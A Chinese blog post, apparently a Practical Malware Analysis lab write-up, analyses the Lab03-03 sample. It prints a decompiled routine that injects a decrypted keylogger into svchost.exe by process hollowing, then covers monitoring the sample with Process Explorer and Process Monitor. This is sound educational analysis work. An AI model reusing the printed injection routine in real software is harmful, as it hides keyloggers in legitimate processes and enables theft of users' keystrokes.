恶意代码分析实验 Lab03-03

最新推荐文章于 2022-04-13 16:33:31 发布
最新推荐文章于 2022-04-13 16:33:31 发布
阅读量1.6k 收藏 12
点赞数 4
分类专栏: 恶意代码分析
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/shannow_123/article/details/89635959
版权

恶意代码分析实验(二)

Lab03-03.exe

使用IDA进行静态分析

将文件拖入IDA进行分析
在这里插入图片描述根据分析得知该程序首先获取本线程的句柄,然后又获取了svchotexe.exe的绝对路径,路径获取过程如下:
获取svchotexe.exe路径之后该程序对UNICODE类的资源LOCALIZATION进行解密,过程如下:
在这里插入图片描述在这里插入图片描述用ResourceHacker找到UNICODE类的资源LOCALIZATION重命名为LABEL2(想写LOCAL。。。抄错了)
在这里插入图片描述
python对资源解密过程如下:
解密资源文件
将解密后的文件拖入HxD中分析,发现是PE文件结构
在这里插入图片描述先将该文件放一下,我们继续分析下一个函数sub_4010EA(LPCSTR lpApplicationName, LPCVOID lpBuffer)
该函数参数分别为svchost.exe的绝对路径和解密后的PE文件地址,分析如下:

// svchost.exe,资源PE
int __cdecl sub_4010EA(LPCSTR lpApplicationName, LPCVOID PEbuffer)
{
  HMODULE v2; // eax
  _DWORD *v4; // ST28_4
  signed int i; // [esp+4h] [ebp-70h]
  int Buffer; // [esp+8h] [ebp-6Ch]
  LPVOID lpBaseAddress; // [esp+Ch] [ebp-68h]
  FARPROC v8; // [esp+10h] [ebp-64h]
  LPCONTEXT lpContext; // [esp+14h] [ebp-60h]
  struct _STARTUPINFOA StartupInfo; // [esp+18h] [ebp-5Ch]
  struct _PROCESS_INFORMATION ProcessInformation; // [esp+5Ch] [ebp-18h]
  char *v12; // [esp+6Ch] [ebp-8h]
  _DWORD *v13; // [esp+70h] [ebp-4h]

  v13 = PEbuffer;
  if ( *(_WORD *)PEbuffer != 'ZM' )
    return 0;
  v12 = (char *)PEbuffer + v13[15];
  if ( *(_DWORD *)v12 != 'EP' )
    return 0;
  memset(&StartupInfo, 0, 0x44u);
  memset(&ProcessInformation, 0, 0x10u);
  if ( !CreateProcessA(lpApplicationName, 0, 0, 0, 0, 4u, 0, 0, &StartupInfo, &ProcessInformation) )// 创建进程svchost.exe
    return 0;
  lpContext = (LPCONTEXT)VirtualAlloc(0, 0x2CCu, 0x1000u, 4u);// 申请内存空间,数据类型为CONTEXT
  lpContext->ContextFlags = 65543;
  if ( !GetThreadContext(ProcessInformation.hThread, lpContext) )// 将进程寄存器信息存入IpContext
    return 0;
  Buffer = 0;
  lpBaseAddress = 0;
  v8 = 0;
  ReadProcessMemory(ProcessInformation.hProcess, (LPCVOID)(lpContext->Ebx + 8), &Buffer, 4u, 0);// 将ebx寄存器+8指向的位置向后读取四字节,存入Buffer
  v2 = GetModuleHandleA(ModuleName);            // 获取模块ntdll.dll的句柄
  v8 = GetProcAddress(v2, ProcName);            // 获取ntdll.dll模块中NtUnmapViewOfSection函数位置
  if ( !v8 )
    return 0;
  ((void (__stdcall *)(HANDLE, int))v8)(ProcessInformation.hProcess, Buffer);// 卸载进程中buffer指向的模块
  lpBaseAddress = VirtualAllocEx(
                    ProcessInformation.hProcess,
                    *((LPVOID *)v12 + 13),
                    *((_DWORD *)v12 + 20),
                    0x3000u,
                    0x40u);
  if ( !lpBaseAddress )
    return 0;
  WriteProcessMemory(ProcessInformation.hProcess, lpBaseAddress, PEbuffer, *((_DWORD *)v12 + 21), 0);// 将PE文件写入IpBaseAddress
  for ( i = 0; i < *((unsigned __int16 *)v12 + 3); ++i )// 执行PE文件
  {
    v4 = (char *)PEbuffer + 40 * i + v13[15] + 248;
    WriteProcessMemory(ProcessInformation.hProcess, (char *)lpBaseAddress + v4[3], (char *)PEbuffer + v4[5], v4[4], 0);
  }
  WriteProcessMemory(ProcessInformation.hProcess, (LPVOID)(lpContext->Ebx + 8), v12 + 52, 4u, 0);
  lpContext->Eax = (DWORD)lpBaseAddress + *((_DWORD *)v12 + 10);
  SetThreadContext(ProcessInformation.hThread, lpContext);
  ResumeThread(ProcessInformation.hThread);
  return 1;
}

定义的CONTEXT结构体类型如下,用于存储寄存器状态:
定义的CONTEXT结构体类型_PROCESS_INFORMATION数据结构如下,用来存储进程信息:
_PROCESS_INFORMATION数据结构接下来分析解密的这个PE文件
在这里插入图片描述查看SetWindowsHookExA函数的资料:
在这里插入图片描述在这里插入图片描述可以分析fn函数了:
在这里插入图片描述分析sub_4010c7函数:
sub_4010C7得出结论该程序执行了键盘监听功能

工作原理

该恶意代码对资源中携带的键盘监视程序进行了加密,在程序运行后,将该PE文件解密,加载svchost.exe程序,并将改程序的内存空间替换为PE文件,执行该文件,对系统当前所有顶级窗口进行监视,记录键盘输入的字符。

动态分析

大概流程清楚了,我们再试着动态分析一波
用rundll32.exe执行该文件
在这里插入图片描述

版本较高的win7win10系统中的rundll32.exe不能启动该程序,要用xp系统

执行之后发现了生成的日志文件,和该文件在同一目录下
在这里插入图片描述

注册表对比

在这里插入图片描述
在这里插入图片描述

信息量有点大。。感觉这个方法可能不太好用。。先放放明天再看吧,和琳琳姐去天台吹风了
---------------第二天的分隔符----------------
思考了一下,注册表是用于存储系统和应用程序的设置信息的数据结构,对这种键盘监听程序来说,可能分析注册表用处不大??(猜
不过倒是可以把重心放在对进程和内存的监控上,这里应该有明显的发现
使用工具Process monitor & process explorer,这两个工具微软的官网上都有,可以直接下载

使用Process Explorer

在这里插入图片描述发现该进程开始后很快结束,留下一个剩余的svchost.exe进程
查看该进程memory的strings,发现该log文件名
在这里插入图片描述除此之外,image和memory中的值不一样,正常情况下来说应该没有变化,由此验证内存被替换过了,根据memory中的[DEL]等键值推断该程序为键盘记录器
找到该进程的PID,在Process monitor中进行查找
在这里插入图片描述

program monitor

在这里插入图片描述发现有许多创建文件的线程,验证之前的猜想

曙雀
关注
专栏目录
恶意代码Lab03-3分析实验
雩停
03-10 1358
题目 在一个安全的环境中执行给定的文件(Lab03-03.exe)中发现的恶意代码,同时使用基础的静态分析和动态分析工具监视它的行为。 问题 当你使用Process Explorer工具进行监视时,你注意到了什么? 本次实验环境为虚拟机Windows XP,首先用IDA静态分析Lab3-03.exe,发现包含许多涉及内存、文件、线程的操作,程序的导入函数如下: 先运行Process monito...
恶意代码分析实战Lab0303
ACdream
01-30 533
这个照例还是先查壳,VC++6.0的 然后使用IDA静态分析Imports和Exports,对几个关键函数进行简单静态分析 问题1:使用工具Process Explorer监视 根据问题的提示,打开Process Explorer,双击运行程序,发现了这个 在程序运行时,调用了svchost.exe。这个二进制程序是个系统文件,结合IDA静态分析,很有可能对这个程序做了恶意
恶意代码分析实战 Lab 3-3
王陈锋的博客
04-13 1250
Lab 3-3 目录 Lab 3-3 1、当使用process monitor进行监控的时候,你发现了什么? 2、你可以找出任何的内存修改代码么? 3、这个恶意代码在主机上的感染特征是什么? 1、当使用process monitor进行监控的时候,你发现了什么? 在打开Lab03-03.exe之前,先开监控软件,进行监控。 在process monitor中,发现程序一启动,就有大量的svchost.exe。 在process monitor中,发现没有Lab03-03.exe
恶意代码分析实战——Lab03-03.exe基础动态分析
妙蛙种子吃了都会妙妙秒的妙脆角的博客
11-05 1916
恶意代码分析实战——Lab03-03.exe基础动态分析篇 一、实验目的 综合运用多种工具,通过基础动态分析,了解Lab03-03.exe实现的基本功能 二、实验环境 winxp虚拟机 kali虚拟机 三、实验过程 1、MD5值 2、peid分析 ...
恶意代码分析实战》实验——Labs-03
草草君
09-08 522
记录《恶意代码分析实战》中的实验,提供相关链接: 电子书的下载 i春秋由相关实验的视频教程 Labs-01-2 实验 1.传至VT。 2.是否被加壳或者混淆?如果加壳,请脱壳。 操作: 1)用PEID检测,发现被加壳: 2)进行深度扫描后发现,是UPX加壳: 3)利用free upx 进行脱壳(脱壳后的程序将会覆盖源程序),发现是由VC++ 6.0编写: 3.有没有导入函数能够暗示出该程序的功能? 操作:利用PEiD进行导入函数查看,会创建互斥、进程和服务,同时进行联网操作。 4.那些基于
Lab03
03-17
Lab03
恶意代码分析实战实验Lab 3-3+Lab 3-4
m0_37442062的博客
05-05 388
Lab 3-3 1.当你使用Process explorer工具进行监视时,你注意到了什么? 每次双击Lab03-03.exe都会创建一个svchost.exe,然后自删除,可能替换了svchost.exe 2.你可以找出任何的内存修改行为吗? 工具:process monitor 单击 然后选择image和memory practicalmalwareanalysis.log [SHIFT] [ENTER] [BACKSPACE] BACKSPACE [TAB] [CTRL] [DEL] [CAPS
恶意代码实战Lab13-01分析
Cosmopolitan的博客
12-10 500
先用peid查一下信息 没加壳,vc6写的,拖入ida反编译 先从资源段解密信息,后来分析是url 进入decrypt函数,用的是xor 接下来上传信息 这里用od动态调试,获取主机名,strcpy base64加密主机名,这里可以用peid的插件识别出base64算法 用InternetOpenUrlA的get请求上传加密的信息 ...
Lab05-01恶意代码分析
12-20
恶意代码分析实战 Lab05-01.dll IDA Pro 21道题详细分析
恶意代码分析实战实验Lab 7-3
m0_37442062的博客
05-06 718
Lab 7-3静态分析strings + IDA pro分析EXE分析DLL1.这个程序如何完成持久化驻留,来确保在计算机被重启后它能继续运行?2.这个恶意代码的两个明显的基于主机特征是什么?3.这个程序的目的是什么?4.一旦这个恶意代码被安装,你如何移除它?参考 静态分析strings + IDA pro 查看字符串 exe kerne`132`.dll kernel32.dll C:\windows\system32\kerne`132`.dll C:\Windows\System32\Kerne
恶意代码分析实战实验Lab 6-3
m0_37442062的博客
05-06 421
Lab 6-3静态分析动态分析1.比较在main函数于实验6-2的mian函数的调用。从main中调用的新的函数是什么?2.这个新的函数使用的参数是什么?3.这个函数包含的主要代码结构是什么?4.这个函数能够做什么?5.在这个恶意代码中有什么本地特征?6.这个恶意代码的目的是什么?参考 静态分析 IDA pro查看字符串 除在Lab 6-2中发现的一些字符串外,还有注册表键、文件路径。 Software\\Microsoft\\Windows\\CurrentVersion\\Run常用于恶意代码自启动
恶意代码分析实战实验Lab 1-1
m0_37442062的博客
05-04 1156
Lab 1-1 对Lab01-01.exeLab01-01.dll进行分析 问题 1.将文件上传至http://www.VirusTotal.com进行分析并查看报告。文件匹配到了已有的反病毒软件特征吗? Lab01-01.exe: 在details里可以看到基础属性、检测历史、命名、PE信息(头、节、导入导出表等) 在community可以看到一些沙箱的分析报告等,有助于对样本加深理解。 Lab01-01.dll:同理上传即可 2.这些文件是什么时候编译的? 使用PEView,这里应该有一个Time
恶意代码分析实战实验Lab 7-1
m0_37442062的博客
05-06 709
Lab 7-1静态分析IDA Pro1.当计算机重启之后,这个程序如何保证它继续运行(达到持久化驻留)?2.为什么这个程序会使用一个互斥量?3.可以用来检测这个程序的基于主机特征是什么?4.检测这个恶意代码的基于网络特征是什么?5.这个程序的目的是什么?6.这个程序什么时候完成执行?参考 静态分析IDA Pro 字符串: 可以看到有一个 MalService,可以推测该程序创建了一个系统服务。 HGL345暂定。网址信息http://www.malwareanalysisbook.com用户代理信息Int
Lab03-数据类型、关系运算符、逻辑运算符(2019.09.30)
luyibaobao的博客
11-19 277
Lab03-数据类型、关系运算符、逻辑运算符 1. 输入格式 编写程序读取两组输入数据: 第一组值为:2 3 4回车 第二组值为:2,3,4回车 输出从键盘读入到的信息。 【输入】 2 3 4 7, 8, 9 【输出】 2 3 4 7 8 9 #include <stdio.h> #include <stdlib.h> int main() { int a,b,c...
恶意代码检测实战-第三章实验二(Lab03-02.dll)
qq_43481350的博客
09-01 794
实验环境: 实验设备环境:windows XP 实验所需工具:PEID,process monitor,process explore,strings,wireshark,regshot. 实验思路 1、静态分析dll中的特征信息 2、安装dll中的恶意代码 3、监控并分析恶意程序的特征 实验过程 首先我们在进行动态分析之前可以进行一些基础的动态分析,使用PEID软件,将dll文件拖入PEID操作如下: 我们可以发现其导出了五个函数,特别是第二个和第三个都是针对服务方面的,所以我们可以认为其dll文件可能
Lab 3-4
bangren3304的博客
01-09 203
Analyze the malware found in the file Lab03-04.exe using basic dynamic analysis tools. (This program is analyzed further in the Chapter 9 labs.) Questions and Short Answers What happens when you...
恶意代码分析实战实验Lab 3-1 + Lab 3-2
m0_37442062的博客
05-05 991
Lab 3-1 使用动态分析基础技术分析Lab03-01.exe文件中发现的恶意代码。 问题 1.找出这个恶意代码的导入函数与字符串列表? 使用PEID和strings 发现有壳,先尝试脱壳。使用linxerUnpacker脱壳失败。 所以说题目中说使用动态分析嘛 使用Dependency Walker(PE模块依赖性分析工具)可以看到导入函数。 使用strings查看字符串 比较可疑的字符串 CONNECT %s:%i HTTP/1.0 联网 admin 管理员 vmx32to64.exe 检测虚拟机
Lab 3-3
bangren3304的博客
01-08 166
Execute the malware found in the file Lab03-03.exe while monitoring it using basic dynamic analysis tools in a safe environment. Questions and Short Answers What do you notice when monitoring th...
恶意代码分析Lab09-03
06-07
恶意代码分析Lab09-03
MS08067 第一期 “恶意代码分析”实战班 正式开班~
Ms08067安全实验室
12-10 453
文章来源|MS08067安全实验恶意代码分析实战班恶意代码分析的分类:恶意代码分析也可作为单独的安全专业类别来看待,不过总体是偏逆向方向的,希望的受众是逆向相关的就行了,比如以前只会逆...
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值